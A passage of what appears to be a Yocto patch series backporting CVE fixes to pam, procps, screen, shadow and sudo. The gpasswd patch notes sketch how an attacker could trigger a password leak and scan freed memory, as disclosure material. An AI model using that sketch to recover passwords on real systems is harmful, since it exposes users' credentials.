[https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb] +CVE: CVE-2024-22365 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + modules/pam_namespace/pam_namespace.c | 18 +----------------- + 1 file changed, 1 insertion(+), 17 deletions(-) + +diff --git a/modules/pam_namespace/pam_namespace.c b/modules/pam_namespace/pam_namespace.c +index 2528cff86..f72d67189 100644 +--- a/modules/pam_namespace/pam_namespace.c ++++ b/modules/pam_namespace/pam_namespace.c +@@ -1201,7 +1201,7 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir, + int dfd = AT_FDCWD; + int dfd_next; + int save_errno; +- int flags = O_RDONLY; ++ int flags = O_RDONLY | O_DIRECTORY; + int rv = -1; + struct stat st; + +@@ -1255,22 +1255,6 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir, + rv = openat(dfd, dir, flags); + } + +- if (rv != -1) { +- if (fstat(rv, &st) != 0) { +- save_errno = errno; +- close(rv); +- rv = -1; +- errno = save_errno; +- goto error; +- } +- if (!S_ISDIR(st.st_mode)) { +- close(rv); +- errno = ENOTDIR; +- rv = -1; +- goto error; +- } +- } +- + if (flags & O_NOFOLLOW) { + /* we are inside user-owned dir - protect */ + if (protect_mount(rv, p, idata) == -1) { diff --git a/meta/recipes-extended/pam/libpam_1.3.1.bb b/meta/recipes-extended/pam/libpam_1.3.1.bb index bc72afe6ad..527a368e2d 100644 --- a/meta/recipes-extended/pam/libpam_1.3.1.bb +++ b/meta/recipes-extended/pam/libpam_1.3.1.bb @@ -24,6 +24,7 @@ SRC_URI = "https://github.com/linux-pam/linux-pam/releases/download/v${PV}/Linux file://pam-security-abstract-securetty-handling.patch \ file://pam-unix-nullok-secure.patch \ file://crypt_configure.patch \ + file://CVE-2024-22365.patch \ " SRC_URI[md5sum] = "558ff53b0fc0563ca97f79e911822165" diff --git a/meta/recipes-extended/procps/procps/CVE-2023-4016.patch b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch new file mode 100644 index 0000000000..50582a8649 --- /dev/null +++ b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch @@ -0,0 +1,85 @@ +From 2c933ecba3bb1d3041a5a7a53a7b4078a6003413 Mon Sep 17 00:00:00 2001 +From: Craig Small <csmall@dropbear.xyz> +Date: Thu, 10 Aug 2023 21:18:38 +1000 +Subject: [PATCH] ps: Fix possible buffer overflow in -C option + +ps allocates memory using malloc(length of arg * len of struct). +In certain strange circumstances, the arg length could be very large +and the multiplecation will overflow, allocating a small amount of +memory. + +Subsequent strncpy() will then write into unallocated memory. +The fix is to use calloc. It's slower but this is a one-time +allocation. Other malloc(x * y) calls have also been replaced +by calloc(x, y) + +References: + https://www.freelists.org/post/procps/ps-buffer-overflow-CVE-20234016 + https://nvd.nist.gov/vuln/detail/CVE-2023-4016 + https://gitlab.com/procps-ng/procps/-/issues/297 + https://bugs.debian.org/1042887 + +Signed-off-by: Craig Small <csmall@dropbear.xyz> + +CVE: CVE-2023-4016 +Upstream-Status: Backport [https://gitlab.com/procps-ng/procps/-/commit/2c933ecba3bb1d3041a5a7a53a7b4078a6003413] + +Signed-off-by: Peter Marko <peter.marko@siemens.com> + +--- + NEWS | 1 + + ps/parser.c | 8 ++++---- + 2 files changed, 5 insertions(+), 4 deletions(-) + +diff --git a/NEWS b/NEWS +index b9509734..64fa3da8 100644 +--- a/NEWS ++++ b/NEWS +@@ -1,3 +1,5 @@ ++ * ps: Fix buffer overflow in -C option CVE-2023-4016 Debian #1042887, issue #297 ++ + procps-ng-3.3.16 + ---------------- + * library: Increment to 8:2:0 +diff --git a/ps/parser.c b/ps/parser.c +index 248aa741..15873dfa 100644 +--- a/ps/parser.c ++++ b/ps/parser.c +@@ -184,7 +184,6 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s + const char *err; /* error code that could or did happen */ + /*** prepare to operate ***/ + node = malloc(sizeof(selection_node)); +- node->u = malloc(strlen(arg)*sizeof(sel_union)); /* waste is insignificant */ + node->n = 0; + buf = strdup(arg); + /*** sanity check and count items ***/ +@@ -205,6 +204,7 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s + } while (*++walk); + if(need_item) goto parse_error; + node->n = items; ++ node->u = calloc(items, sizeof(sel_union)); + /*** actually parse the list ***/ + walk = buf; + while(items--){ +@@ -1031,15 +1031,15 @@ static const char *parse_trailing_pids(void){ + thisarg = ps_argc - 1; /* we must be at the end now */ + + pidnode = malloc(sizeof(selection_node)); +- pidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */ ++ pidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */ + pidnode->n = 0; + + grpnode = malloc(sizeof(selection_node)); +- grpnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */ ++ grpnode->u = calloc(i,sizeof(sel_union)); /* waste is insignificant */ + grpnode->n = 0; + + sidnode = malloc(sizeof(selection_node)); +- sidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */ ++ sidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */ + sidnode->n = 0; + + while(i--){ +-- +GitLab + diff --git a/meta/recipes-extended/procps/procps_3.3.16.bb b/meta/recipes-extended/procps/procps_3.3.16.bb index 2810ebd285..ac27734a6f 100644 --- a/meta/recipes-extended/procps/procps_3.3.16.bb +++ b/meta/recipes-extended/procps/procps_3.3.16.bb @@ -12,8 +12,9 @@ DEPENDS = "ncurses" inherit autotools gettext pkgconfig update-alternatives -SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https \ +SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https;branch=master \ file://sysctl.conf \ + file://CVE-2023-4016.patch \ " SRCREV = "59c88e18f29000ceaf7e5f98181b07be443cf12f" diff --git a/meta/recipes-extended/psmisc/psmisc_23.3.bb b/meta/recipes-extended/psmisc/psmisc_23.3.bb index e569f1074b..36e6775f9e 100644 --- a/meta/recipes-extended/psmisc/psmisc_23.3.bb +++ b/meta/recipes-extended/psmisc/psmisc_23.3.bb @@ -2,7 +2,7 @@ require psmisc.inc LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3" -SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https \ +SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https;branch=master \ file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \ " SRCREV = "78bde849041e6c914a2a517ebe1255b86dc98772" diff --git a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb index cb5b288c48..0f8a6f74f8 100644 --- a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb +++ b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb @@ -19,7 +19,7 @@ PV = "1.4+git${SRCPV}" SRCREV = "9bc3b5b785723cfff459b0c01b39d87d4bed975c" -SRC_URI = "git://github.com/thkukuk/${BPN} \ +SRC_URI = "git://github.com/thkukuk/${BPN};branch=master;protocol=https \ file://0001-Use-cross-compiled-rpcgen.patch \ " diff --git a/meta/recipes-extended/screen/screen/CVE-2023-24626.patch b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch new file mode 100644 index 0000000000..73caf9d81b --- /dev/null +++ b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch @@ -0,0 +1,40 @@ +From e9ad41bfedb4537a6f0de20f00b27c7739f168f7 Mon Sep 17 00:00:00 2001 +From: Alexander Naumov <alexander_naumov@opensuse.org> +Date: Mon, 30 Jan 2023 17:22:25 +0200 +Subject: fix: missing signal sending permission check on failed query messages + +Signed-off-by: Alexander Naumov <alexander_naumov@opensuse.org> + +CVE: CVE-2023-24626 +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/screen.git/commit/?id=e9ad41bfedb4537a6f0de20f00b27c7739f168f7] +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + socket.c | 9 +++++++-- + 1 file changed, 7 insertions(+), 2 deletions(-) + +diff --git a/socket.c b/socket.c +index bb68b35..9d87445 100644 +--- a/socket.c ++++ b/socket.c +@@ -1285,11 +1285,16 @@ ReceiveMsg() + else + queryflag = -1; + +- Kill(m.m.command.apid, ++ if (CheckPid(m.m.command.apid)) { ++ Msg(0, "Query attempt with bad pid(%d)!", m.m.command.apid); ++ } ++ else { ++ Kill(m.m.command.apid, + (queryflag >= 0) + ? SIGCONT + : SIG_BYE); /* Send SIG_BYE if an error happened */ +- queryflag = -1; ++ queryflag = -1; ++ } + } + break; + case MSG_COMMAND: +-- +2.25.1 + diff --git a/meta/recipes-extended/screen/screen_4.8.0.bb b/meta/recipes-extended/screen/screen_4.8.0.bb index fe640c262b..c4faa27023 100644 --- a/meta/recipes-extended/screen/screen_4.8.0.bb +++ b/meta/recipes-extended/screen/screen_4.8.0.bb @@ -22,6 +22,7 @@ SRC_URI = "${GNU_MIRROR}/screen/screen-${PV}.tar.gz \ file://0001-fix-for-multijob-build.patch \ file://0001-Remove-more-compatibility-stuff.patch \ file://CVE-2021-26937.patch \ + file://CVE-2023-24626.patch \ " SRC_URI[md5sum] = "d276213d3acd10339cd37848b8c4ab1e" diff --git a/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch new file mode 100644 index 0000000000..aea07ff361 --- /dev/null +++ b/meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch @@ -0,0 +1,66 @@ +From 2eaea70111f65b16d55998386e4ceb4273c19eb4 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Christian=20G=C3=B6ttsche?= <cgzones@googlemail.com> +Date: Fri, 31 Mar 2023 14:46:50 +0200 +Subject: [PATCH] Overhaul valid_field() + +e5905c4b ("Added control character check") introduced checking for +control characters but had the logic inverted, so it rejects all +characters that are not control ones. + +Cast the character to `unsigned char` before passing to the character +checking functions to avoid UB. + +Use strpbrk(3) for the illegal character test and return early. + +Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/2eaea70111f65b16d55998386e4ceb4273c19eb4] + +Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com> +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + lib/fields.c | 24 ++++++++++-------------- + 1 file changed, 10 insertions(+), 14 deletions(-) + +diff --git a/lib/fields.c b/lib/fields.c +index fb51b582..53929248 100644 +--- a/lib/fields.c ++++ b/lib/fields.c +@@ -37,26 +37,22 @@ int valid_field (const char *field, const char *illegal) + + /* For each character of field, search if it appears in the list + * of illegal characters. */ ++ if (illegal && NULL != strpbrk (field, illegal)) { ++ return -1; ++ } ++ ++ /* Search if there are non-printable or control characters */ + for (cp = field; '\0' != *cp; cp++) { +- if (strchr (illegal, *cp) != NULL) { ++ unsigned char c = *cp; ++ if (!isprint (c)) { ++ err = 1; ++ } ++ if (iscntrl (c)) { + err = -1; + break; + } + } + +- if (0 == err) { +- /* Search if there are non-printable or control characters */ +- for (cp = field; '\0' != *cp; cp++) { +- if (!isprint (*cp)) { +- err = 1; +- } +- if (!iscntrl (*cp)) { +- err = -1; +- break; +- } +- } +- } +- + return err; + } + +-- +2.34.1 + diff --git a/meta/recipes-extended/shadow/files/CVE-2023-29383.patch b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch new file mode 100644 index 0000000000..dbf4a508e9 --- /dev/null +++ b/meta/recipes-extended/shadow/files/CVE-2023-29383.patch @@ -0,0 +1,54 @@ +From e5905c4b84d4fb90aefcd96ee618411ebfac663d Mon Sep 17 00:00:00 2001 +From: tomspiderlabs <128755403+tomspiderlabs@users.noreply.github.com> +Date: Thu, 23 Mar 2023 23:39:38 +0000 +Subject: [PATCH] Added control character check + +Added control character check, returning -1 (to "err") if control characters are present. + +CVE: CVE-2023-29383 +Upstream-Status: Backport + +Reference to upstream: +https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d + +Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com> +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + lib/fields.c | 11 +++++++---- + 1 file changed, 7 insertions(+), 4 deletions(-) + +diff --git a/lib/fields.c b/lib/fields.c +index 640be931..fb51b582 100644 +--- a/lib/fields.c ++++ b/lib/fields.c +@@ -21,9 +21,9 @@ + * + * The supplied field is scanned for non-printable and other illegal + * characters. +- * + -1 is returned if an illegal character is present. +- * + 1 is returned if no illegal characters are present, but the field +- * contains a non-printable character. ++ * + -1 is returned if an illegal or control character is present. ++ * + 1 is returned if no illegal or control characters are present, ++ * but the field contains a non-printable character. + * + 0 is returned otherwise. + */ + int valid_field (const char *field, const char *illegal) +@@ -45,10 +45,13 @@ int valid_field (const char *field, const char *illegal) + } + + if (0 == err) { +- /* Search if there are some non-printable characters */ ++ /* Search if there are non-printable or control characters */ + for (cp = field; '\0' != *cp; cp++) { + if (!isprint (*cp)) { + err = 1; ++ } ++ if (!iscntrl (*cp)) { ++ err = -1; + break; + } + } +-- +2.34.1 + diff --git a/meta/recipes-extended/shadow/files/CVE-2023-4641.patch b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch new file mode 100644 index 0000000000..75dbbad299 --- /dev/null +++ b/meta/recipes-extended/shadow/files/CVE-2023-4641.patch @@ -0,0 +1,146 @@ +From 51731b01fd9a608397da22b7b9164e4996f3d4c6 Mon Sep 17 00:00:00 2001 +From: Alejandro Colomar <alx@kernel.org> +Date: Sat, 10 Jun 2023 16:20:05 +0200 +Subject: [PATCH] gpasswd(1): Fix password leak + +CVE: CVE-2023-4641 +Upstream-Status: Backport [https://github.com/shadow-maint/shadow/commit/65c88a43a23c2391dcc90c0abda3e839e9c57904] + +How to trigger this password leak? +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +When gpasswd(1) asks for the new password, it asks twice (as is usual +for confirming the new password). Each of those 2 password prompts +uses agetpass() to get the password. If the second agetpass() fails, +the first password, which has been copied into the 'static' buffer +'pass' via STRFCPY(), wasn't being zeroed. + +agetpass() is defined in <./libmisc/agetpass.c> (around line 91), and +can fail for any of the following reasons: + +- malloc(3) or readpassphrase(3) failure. + + These are going to be difficult to trigger. Maybe getting the system + to the limits of memory utilization at that exact point, so that the + next malloc(3) gets ENOMEM, and possibly even the OOM is triggered. + About readpassphrase(3), ENFILE and EINTR seem the only plausible + ones, and EINTR probably requires privilege or being the same user; + but I wouldn't discard ENFILE so easily, if a process starts opening + files. + +- The password is longer than PASS_MAX. + + The is plausible with physical access. However, at that point, a + keylogger will be a much simpler attack. + +And, the attacker must be able to know when the second password is being +introduced, which is not going to be easy. + +How to read the password after the leak? +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Provoking the leak yourself at the right point by entering a very long +password is easy, and inspecting the process stack at that point should +be doable. Try to find some consistent patterns. + +Then, search for those patterns in free memory, right after the victim +leaks their password. + +Once you get the leak, a program should read all the free memory +searching for patterns that gpasswd(1) leaves nearby the leaked +password. + +On 6/10/23 03:14, Seth Arnold wrote: +> An attacker process wouldn't be able to use malloc(3) for this task. +> There's a handful of tools available for userspace to allocate memory: +> +> - brk / sbrk +> - mmap MAP_ANONYMOUS +> - mmap /dev/zero +> - mmap some other file +> - shm_open +> - shmget +> +> Most of these return only pages of zeros to a process. Using mmap of an +> existing file, you can get some of the contents of the file demand-loaded +> into the memory space on the first use. +> +> The MAP_UNINITIALIZED flag only works if the kernel was compiled with +> CONFIG_MMAP_ALLOW_UNINITIALIZED. This is rare. +> +> malloc(3) doesn't zero memory, to our collective frustration, but all the +> garbage in the allocations is from previous allocations in the current +> process. It isn't leftover from other processes. +> +> The avenues available for reading the memory: +> - /dev/mem and /dev/kmem (requires root, not available with Secure Boot) +> - /proc/pid/mem (requires ptrace privileges, mediated by YAMA) +> - ptrace (requires ptrace privileges, mediated by YAMA) +> - causing memory to be swapped to disk, and then inspecting the swap +> +> These all require a certain amount of privileges. + +How to fix it? +~~~~~~~~~~~~~~ + +memzero(), which internally calls explicit_bzero(3), or whatever +alternative the system provides with a slightly different name, will +make sure that the buffer is zeroed in memory, and optimizations are not +allowed to impede this zeroing. + +This is not really 100% effective, since compilers may place copies of +the string somewhere hidden in the stack. Those copies won't get zeroed +by explicit_bzero(3). However, that's arguably a compiler bug, since +compilers should make everything possible to avoid optimizing strings +that are later passed to explicit_bzero(3). But we all know that +sometimes it's impossible to have perfect knowledge in the compiler, so +this is plausible. Nevertheless, there's nothing we can do against such +issues, except minimizing the time such passwords are stored in plain +text. + +Security concerns +~~~~~~~~~~~~~~~~~ + +We believe this isn't easy to exploit. Nevertheless, and since the fix +is trivial, this fix should probably be applied soon, and backported to +all supported distributions, to prevent someone else having more +imagination than us to find a way. + +Affected versions +~~~~~~~~~~~~~~~~~ + +All. Bug introduced in shadow 19990709. That's the second commit in +the git history. + +Fixes: 45c6603cc86c ("[svn-upgrade] Integrating new upstream version, shadow (19990709)") +Reported-by: Alejandro Colomar <alx@kernel.org> +Cc: Serge Hallyn <serge@hallyn.com> +Cc: Iker Pedrosa <ipedrosa@redhat.com> +Cc: Seth Arnold <seth.arnold@canonical.com> +Cc: Christian Brauner <christian@brauner.io> +Cc: Balint Reczey <rbalint@debian.org> +Cc: Sam James <sam@gentoo.org> +Cc: David Runge <dvzrv@archlinux.org> +Cc: Andreas Jaeger <aj@suse.de> +Cc: <~hallyn/shadow@lists.sr.ht> +Signed-off-by: Alejandro Colomar <alx@kernel.org> +Signed-off-by: Hugo SIMELIERE <hsimeliere.opensource@witekio.com> +--- + src/gpasswd.c | 1 + + 1 file changed, 1 insertion(+) + +diff --git a/src/gpasswd.c b/src/gpasswd.c +index 4d75af96..a698b32a 100644 +--- a/src/gpasswd.c ++++ b/src/gpasswd.c +@@ -918,6 +918,7 @@ static void change_passwd (struct group *gr) + strzero (cp); + cp = getpass (_("Re-enter new password: ")); + if (NULL == cp) { ++ memzero (pass, sizeof pass); + exit (1); + } + +-- +2.42.0 + diff --git a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb index 5f7ea00bf1..4e68f826c6 100644 --- a/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb +++ b/meta/recipes-extended/shadow/shadow-sysroot_4.6.bb @@ -2,7 +2,7 @@ SUMMARY = "Shadow utils requirements for useradd.bbclass" HOMEPAGE = "http://github.com/shadow-maint/shadow" BUGTRACKER = "http://github.com/shadow-maint/shadow/issues" SECTION = "base utils" -LICENSE = "BSD | Artistic-1.0" +LICENSE = "BSD-3-Clause | Artistic-1.0" LIC_FILES_CHKSUM = "file://login.defs_shadow-sysroot;md5=25e2f2de4dfc8f966ac5cdfce45cd7d5" DEPENDS = "base-passwd" diff --git a/meta/recipes-extended/shadow/shadow.inc b/meta/recipes-extended/shadow/shadow.inc index 7061dc7505..c16292c38a 100644 --- a/meta/recipes-extended/shadow/shadow.inc +++ b/meta/recipes-extended/shadow/shadow.inc @@ -3,7 +3,7 @@ HOMEPAGE = "http://github.com/shadow-maint/shadow" DESCRIPTION = "${SUMMARY}" BUGTRACKER = "http://github.com/shadow-maint/shadow/issues" SECTION = "base/utils" -LICENSE = "BSD | Artistic-1.0" +LICENSE = "BSD-3-Clause | Artistic-1.0" LIC_FILES_CHKSUM = "file://COPYING;md5=ed80ff1c2b40843cf5768e5229cf16e5 \ file://src/passwd.c;beginline=2;endline=30;md5=5720ff729a6ff39ecc9f64555d75f4af" @@ -14,6 +14,9 @@ SRC_URI = "https://github.com/shadow-maint/shadow/releases/download/${PV}/${BP}. file://shadow-4.1.3-dots-in-usernames.patch \ ${@bb.utils.contains('PACKAGECONFIG', 'pam', '${PAM_SRC_URI}', '', d)} \ file://shadow-relaxed-usernames.patch \ + file://CVE-2023-29383.patch \ + file://0001-Overhaul-valid_field.patch \ + file://CVE-2023-4641.patch \ " SRC_URI_append_class-target = " \ diff --git a/meta/recipes-extended/shadow/shadow_4.8.1.bb b/meta/recipes-extended/shadow/shadow_4.8.1.bb index ff4aad926f..9dfcd4bc10 100644 --- a/meta/recipes-extended/shadow/shadow_4.8.1.bb +++ b/meta/recipes-extended/shadow/shadow_4.8.1.bb @@ -9,3 +9,7 @@ BBCLASSEXTEND = "native nativesdk" # Severity is low and marked as closed and won't fix. # https://bugzilla.redhat.com/show_bug.cgi?id=884658 CVE_CHECK_WHITELIST += "CVE-2013-4235" + +# This is an issue for a different shadow +CVE_CHECK_WHITELIST += "CVE-2016-15024" + diff --git a/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch new file mode 100644 index 0000000000..9dfca0441b --- /dev/null +++ b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch @@ -0,0 +1,26 @@ +From 2386cd8f907b379ae5cc1ce2888abef7d30e709a Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin <alex@linutronix.de> +Date: Sat, 23 Oct 2021 20:20:59 +0200 +Subject: [PATCH] Makefile: do not write the timestamp into compressed manpage. + +This helps reproducibility. + +Upstream-Status: Submitted [https://github.com/ColinIanKing/stress-ng/pull/156] +Signed-off-by: Alexander Kanavin <alex@linutronix.de> +--- + Makefile | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/Makefile b/Makefile +index 886018f9..f4290f9c 100644 +--- a/Makefile ++++ b/Makefile +@@ -412,7 +412,7 @@ git-commit-id.h: + $(OBJS): stress-ng.h Makefile + + stress-ng.1.gz: stress-ng.1 +- gzip -c $< > $@ ++ gzip -n -c $< > $@ + + .PHONY: dist + dist: diff --git a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb index 9b987c7bde..cf94e0275b 100644 --- a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb +++ b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb @@ -5,11 +5,12 @@ HOMEPAGE = "https://kernel.ubuntu.com/~cking/stress-ng/" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "https://kernel.ubuntu.com/~cking/tarballs/${BPN}/${BP}.tar.xz \ +SRC_URI = "git://github.com/ColinIanKing/stress-ng.git;protocol=https;branch=master \ file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \ + file://0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch \ " -SRC_URI[md5sum] = "7b89157c838f2bb4bdeba8f46e3c56ae" -SRC_URI[sha256sum] = "860291dd3a18b985b3483190a627bbede2b5c52113766c1921001b3fb4b83af0" +SRCREV = "e045bcd711178c11b7e797ef6b4c524658468596" +S = "${WORKDIR}/git" DEPENDS = "coreutils-native" diff --git a/meta/recipes-extended/sudo/files/CVE-2023-22809.patch b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch new file mode 100644 index 0000000000..6c47eb3e44 --- /dev/null +++ b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch @@ -0,0 +1,113 @@ +Backport of: + +# HG changeset patch +# Parent 7275148cad1f8cd3c350026460acc4d6ad349c3a +sudoedit: do not permit editor arguments to include "--" +We use "--" to separate the editor and arguments from the files to edit. +If the editor arguments include "--", sudo can be tricked into allowing +the user to edit a file not permitted by the security policy. +Thanks to Matthieu Barjole and Victor Cutillas of Synacktiv +(https://synacktiv.com) for finding this bug. + +CVE: CVE-2023-22809 +Upstream-Staus: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.8.31-1ubuntu1.4.debian.tar.xz] +Signed-off-by: Omkar Patil <omkar.patil@kpit.com> + +--- a/plugins/sudoers/editor.c ++++ b/plugins/sudoers/editor.c +@@ -56,7 +56,7 @@ resolve_editor(const char *ed, size_t ed + const char *cp, *ep, *tmp; + const char *edend = ed + edlen; + struct stat user_editor_sb; +- int nargc; ++ int nargc = 0; + debug_decl(resolve_editor, SUDOERS_DEBUG_UTIL) + + /* +@@ -102,6 +102,21 @@ resolve_editor(const char *ed, size_t ed + free(editor_path); + while (nargc--) + free(nargv[nargc]); ++ free(nargv); ++ debug_return_str(NULL); ++ } ++ ++ /* ++ * We use "--" to separate the editor and arguments from the files ++ * to edit. The editor arguments themselves may not contain "--". ++ */ ++ if (strcmp(nargv[nargc], "--") == 0) { ++ sudo_warnx(U_("ignoring editor: %.*s"), (int)edlen, ed); ++ sudo_warnx("%s", U_("editor arguments may not contain \"--\"")); ++ errno = EINVAL; ++ free(editor_path); ++ while (nargc--) ++ free(nargv[nargc]); + free(nargv); + debug_return_str(NULL); + } +--- a/plugins/sudoers/sudoers.c ++++ b/plugins/sudoers/sudoers.c +@@ -616,20 +616,31 @@ sudoers_policy_main(int argc, char * con + + /* Note: must call audit before uid change. */ + if (ISSET(sudo_mode, MODE_EDIT)) { ++ const char *env_editor = NULL; + int edit_argc; +- const char *env_editor; + + free(safe_cmnd); + safe_cmnd = find_editor(NewArgc - 1, NewArgv + 1, &edit_argc, + &edit_argv, NULL, &env_editor, false); + if (safe_cmnd == NULL) { +- if (errno != ENOENT) ++ switch (errno) { ++ case ENOENT: ++ audit_failure(NewArgc, NewArgv, N_("%s: command not found"), ++ env_editor ? env_editor : def_editor); ++ sudo_warnx(U_("%s: command not found"), ++ env_editor ? env_editor : def_editor); ++ goto bad; ++ case EINVAL: ++ if (def_env_editor && env_editor != NULL) { ++ /* User tried to do something funny with the editor. */ ++ log_warningx(SLOG_NO_STDERR|SLOG_SEND_MAIL, ++ "invalid user-specified editor: %s", env_editor); ++ goto bad; ++ } ++ /* FALLTHROUGH */ ++ default: + goto done; +- audit_failure(NewArgc, NewArgv, N_("%s: command not found"), +- env_editor ? env_editor : def_editor); +- sudo_warnx(U_("%s: command not found"), +- env_editor ? env_editor : def_editor); +- goto bad; ++ } + } + if (audit_success(edit_argc, edit_argv) != 0 && !def_ignore_audit_errors) + goto done; +--- a/plugins/sudoers/visudo.c ++++ b/plugins/sudoers/visudo.c +@@ -308,7 +308,7 @@ static char * + get_editor(int *editor_argc, char ***editor_argv) + { + char *editor_path = NULL, **whitelist = NULL; +- const char *env_editor; ++ const char *env_editor = NULL; + static char *files[] = { "+1", "sudoers" }; + unsigned int whitelist_len = 0; + debug_decl(get_editor, SUDOERS_DEBUG_UTIL) +@@ -342,7 +342,11 @@ get_editor(int *editor_argc, char ***edi + if (editor_path == NULL) { + if (def_env_editor && env_editor != NULL) { + /* We are honoring $EDITOR so this is a fatal error. */ +- sudo_fatalx(U_("specified editor (%s) doesn't exist"), env_editor); ++ if (errno == ENOENT) { ++ sudo_warnx(U_("specified editor (%s) doesn't exist"), ++ env_editor); ++ } ++ exit(EXIT_FAILURE); + } + sudo_fatalx(U_("no editor found (editor path = %s)"), def_editor); + } diff --git a/meta/recipes-extended/sudo/sudo.inc b/meta/recipes-extended/sudo/sudo.inc index 153731c807..9c7279d25a 100644 --- a/meta/recipes-extended/sudo/sudo.inc +++ b/meta/recipes-extended/sudo/sudo.inc @@ -3,7 +3,7 @@ DESCRIPTION = "Sudo (superuser do) allows a system administrator to give certain HOMEPAGE = "http://www.sudo.ws" BUGTRACKER = "http://www.sudo.ws/bugs/" SECTION = "admin" -LICENSE = "ISC & BSD & Zlib" +LICENSE = "ISC & BSD-3-Clause & BSD-2-Clause & Zlib" LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=07966675feaddba70cc812895b248230 \ file://plugins/sudoers/redblack.c;beginline=1;endline=46;md5=03e35317699ba00b496251e0dfe9f109 \ file://lib/util/reallocarray.c;beginline=3;endline=15;md5=397dd45c7683e90b9f8bf24638cf03bf \ diff --git a/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch new file mode 100644 index 0000000000..1336c7701d --- /dev/null +++ b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch @@ -0,0 +1,59 @@ +From e1554d7996a59bf69544f3d8dd4ae683027948f9 Mon Sep 17 00:00:00 2001 +From: Hitendra Prajapati <hprajapati@mvista.com> +Date: Tue, 15 Nov 2022 09:17:18 +0530 +Subject: [PATCH] CVE-2022-43995 + +Upstream-Status: Backport [https://github.com/sudo-project/sudo/commit/bd209b9f16fcd1270c13db27ae3329c677d48050] +CVE: CVE-2022-43995 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> + +Potential heap overflow for passwords < 8 +characters. Starting with sudo 1.8.0 the plaintext password buffer is +dynamically sized so it is not safe to assume that it is at least 9 bytes in +size. +Found by Hugo Lefeuvre (University of Manchester) with ConfFuzz. +--- + plugins/sudoers/auth/passwd.c | 11 +++++------ + 1 file changed, 5 insertions(+), 6 deletions(-) + +diff --git a/plugins/sudoers/auth/passwd.c b/plugins/sudoers/auth/passwd.c +index 03c7a16..76a7824 100644 +--- a/plugins/sudoers/auth/passwd.c ++++ b/plugins/sudoers/auth/passwd.c +@@ -63,7 +63,7 @@ sudo_passwd_init(struct passwd *pw, sudo_auth *auth) + int + sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_conv_callback *callback) + { +- char sav, *epass; ++ char des_pass[9], *epass; + char *pw_epasswd = auth->data; + size_t pw_len; + int matched = 0; +@@ -75,12 +75,12 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c + + /* + * Truncate to 8 chars if standard DES since not all crypt()'s do this. +- * If this turns out not to be safe we will have to use OS 